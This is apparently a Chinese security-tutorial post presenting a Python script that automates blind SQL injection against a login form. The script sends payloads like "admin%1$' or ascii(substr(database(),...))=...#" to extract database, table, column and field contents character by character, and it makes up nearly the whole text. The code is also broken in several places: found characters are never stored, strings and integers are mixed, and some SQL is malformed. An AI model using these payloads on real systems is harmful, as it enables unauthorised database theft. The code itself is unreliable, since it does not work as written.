从零开始学安全(三十五)●mysql 盲注手工自定义python脚本

import requests
import string
#mysql  手动注入 通用脚本 适用盲注 可以跟具自己的需求更改
def  home():
    url="url"
    list=string.digits+string.letters+"!@#$%^&*()_+{}-=<>,./?"
    s=requests.session()
    success = ""  # 成功返回的特征
    error="" #失败返回的体征

# 1.拿到当前连接数据库长度
    leng=0
    i=0
    while True:
        sql="admin%1$\' or  length(database())>"+str(i)+"#"
        data={"username":sql,"passwrod":1}
        r=s.post(url,data=data).content
        if  error in r :
            leng=i
            i=0
            break
        i+=1
    print ("length the database:%d" %leng)

#2.拿到当前连接数据库名
    strs=''
    for t in range(leng):
        for l in list:
            sql="admin%1$\' or ascii(substr(database(),"+str(t)+",1))="+str(ord(l))+"#"
            data = {"username": sql, "passwrod": 1}
            r=s.post(url,data=data).content
            if success in r:
                strs+=strs
                break
    print("database is :%s" % (strs))

#3.拿当前数据库里面的所有表
    #拿到数据库表添加的长度
    while True:
        sql="admin%1$\' or select length(group_concat(table_name)) from information_schema.tables where table_type='base table' and table_schema=database()<"+i+"#"
        data = {"username": sql, "passwrod": 1}
        r = s.post(url, data=data).content
        if error in r:
            leng=i
            i=0
            break
        i+=1
    print("length table is :%s" % (leng))
    #返回所有表
    for t in range(leng):
        for l in list:
            sql = "admin%1$\' or ascii(substr(select group_concat(table_name) from information_schema.tables where table_type='base table' and table_schema=database(),"+str(t)+",1))="+str(ord(l))+"#"
            data = {"username": sql, "passwrod": 1}
            r=s.post(url,data=data).content
            if success in r:
                strs+=strs
                break
    print("talbes is :%s" % (strs))
#4.选择先要查询的表  返回表所有字段
    #返回长度
    table='table'#要查找的表名
    tablename = '0x' + table.encode('hex')
    table_name = table
    while True:
        sql = "admin%1$\' or select length(group_concat(column_name)) from information_schema.columns  where table_name='"+table_name+"' and table_schema=database()<" + i + "#"
        data = {"username": sql, "passwrod": 1}
        r = s.post(url, data=data).content
        if error in r:
            leng = i
            i = 0
            break
        i += 1
    print("length table is :%s" % (leng))
    # 返回所有表
    for t in range(leng):
        for l in list:
            sql = "admin%1$\' or ascii(substr(select group_concat(column_name) from information_schema.columns where table_name='"+table_name+"' and table_schema=database()," + str(
                t) + ",1))=" + str(ord(l)) + "#"
            data = {"username": sql, "passwrod": 1}
            r = s.post(url, data=data).content
            if success in r:
                strs += strs
                break
    print("talbes is :%s" % (strs))
# 5.返回相应字段里面的值
    num=0
    while True:
        sql = "admin%1$\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
        data = {'username':sql,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            num = i
            i=0
            break
        i+=1
        pass
    print("[+]number(column): %d" %(num))

    # 返回长度
    table = 'table'  # 要查找的表名
    col='user'#要返回的字段
    for t in range(leng):
        for l in list:
            sql = "admin%1$\' or  ascii(substr(select "+col+" from limit 0,1 "+table_name+","+str(t)+",1))=" + str(ord(l)) + "#"
            data = {"username": sql, "passwrod": 1}
            r = s.post(url, data=data).content
            if success in r:
                strs += strs
                break
    print("talbes is :%s" % (strs))